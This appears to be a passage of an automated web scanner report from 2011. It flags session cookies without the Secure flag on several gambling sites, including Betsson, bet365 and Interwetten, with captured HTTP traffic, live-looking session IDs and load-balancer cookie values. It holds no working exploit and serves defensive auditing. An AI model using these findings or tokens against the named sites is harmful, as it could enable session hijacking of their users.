https://www.betsson.com/en/customer-service/terms/index.asp
https://www.betsson.com/en/my-account/refer-a-friend/index.asp
https://www.betsson.com/my-account/refer-a-friend/index.asp
https://www.betsson.com/web/en/sportsbook/
https://www.interwetten.com/en/Default.aspx
https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx
https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js
https://www.betsson.com/start/en/
https://www.betsson.com/start/is/
https://www.interwetten.com/
https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
https://www.thawte.com/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://bingo.betsson.com/en/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://bingo.betsson.com
Path:	/en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: bingo.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.2. https://help.betsson.com/display/4/kb/faq/index.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://help.betsson.com
Path:	/display/4/kb/faq/index.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=qiv3sin4m5umjyaekpf4yp55; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/4/kb/faq/index.aspx HTTP/1.1
Host: help.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 12:02:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /index.aspx
Set-Cookie: ASP.NET_SessionId=qiv3sin4m5umjyaekpf4yp55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 128

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/index.aspx'>here</a>.</h2>
</body></html>

7.3. https://members.bet365.com/members/chat/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://members.bet365.com
Path:	/members/chat/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

session=processform=0&stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /members/chat/ HTTP/1.1
Host: members.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:34:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
p3p: CP="CAO PSA OUR"
p3p: CP="CAO PSA OUR"
Set-Cookie: session=processform=0&stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
bet365
</
...[SNIP]...

7.4. https://poker.betsson.com/en/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://poker.betsson.com
Path:	/en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: poker.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.5. https://scratch.betsson.com/en/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://scratch.betsson.com
Path:	/en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/?navbar=true HTTP/1.1
Host: scratch.betsson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

7.6. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/Lobby.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=2vrbnn55eaea4a45yqh5ecex; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScratchCards/Lobby.aspx HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.7. https://www.betsson.com/en/about/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/about/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAQQDRSDT=OIEEAKPDPIECBJMMIOMNPPEC; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://about.betsson.com/en/
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=OIEEAKPDPIECBJMMIOMNPPEC; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:43 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/

7.8. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/about/company-information/payments-and-security/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAASDBABS=KDMLJIPDPDOMNHLOJJMHPKKA; path=/
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/company-information/payments-and-security/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://about.betsson.com/en/licenses-and-security/
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=KDMLJIPDPDOMNHLOJJMHPKKA; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:49 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/

7.9. https://www.betsson.com/en/customer-service/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23563
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...

7.10. https://www.betsson.com/en/customer-service/forgotten-password/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/forgotten-password/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAQQDRSDT=KIEEAKPDAIGMFJDJEJFFOHCB; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/forgotten-password/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13183
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KIEEAKPDAIGMFJDJEJFFOHCB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...

7.11. https://www.betsson.com/en/customer-service/privacy-statement/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/privacy-statement/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAASDBABS=EBMLJIPDHIKKMCGJMGGHLPPD; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/privacy-statement/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16611
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=EBMLJIPDHIKKMCGJMGGHLPPD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...

7.12. https://www.betsson.com/en/customer-service/responsible-gaming/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/responsible-gaming/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16796
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:40 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...

7.13. https://www.betsson.com/en/customer-service/terms/index.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/terms/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68223
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...

7.14. https://www.betsson.com/en/my-account/refer-a-friend/index.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAQQDRSDT=KLEEAKPDFACFJMDHHKDNNLBO; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 187
Content-Type: text/html; Charset=UTF-8
Location: /en/need-login.asp?redPage=/en/my-account/refer-a-friend/index.asp
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KLEEAKPDFACFJMDHHKDNNLBO; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:49 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/en/need-login.asp?redPage=/en/my-account/refer-a-friend/index.asp">here</a>.</body>

7.15. https://www.betsson.com/my-account/refer-a-friend/index.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDAQQDRSDT=FCFEAKPDAANKFEPNPAAALGCD; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23633
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQDRSDT=FCFEAKPDAANKFEPNPAAALGCD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:09:12 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta htt
...[SNIP]...

7.16. https://www.betsson.com/web/en/sportsbook/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/web/en/sportsbook/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.17. https://www.interwetten.com/en/Default.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.interwetten.com
Path:	/en/Default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/Default.aspx HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPool_Web01-Web07=1717899692.20480.0000

Response

7.18. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/core/StartPlaying/Api/StartPlayingInit.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Api/StartPlayingInit.ashx HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:35 GMT
Connection: close
Content-Length: 1480
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

/* current StartPlaying.Web version: 1.3 */
if(typeof(Betsson_StartPlaying) != "undefined")
{
Betsson_StartPlaying.Popup.workflow = {"Processes":[{"Activities":[{"Action":null,"Arg":null,"Name"
...[SNIP]...

7.19. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Scripts/Compiled/StartPlayingApi.js HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 09:14:03 GMT
Accept-Ranges: bytes
ETag: "c2a920d0baeecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:34 GMT
Connection: close
Content-Length: 4941
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

var Betsson_StartPlaying={Popup:{workflow:{},startPlayingBaseUrl:"",GetProcessIndex:function(itemName){for(i=0;i<this.workflow.Processes.length;i++){var itm=this.workflow.Processes[i];if(itm.Name==ite
...[SNIP]...

7.20. https://www.betsson.com/start/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:52 GMT
Connection: close
Content-Length: 42417
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.21. https://www.betsson.com/start/is/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/start/is/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

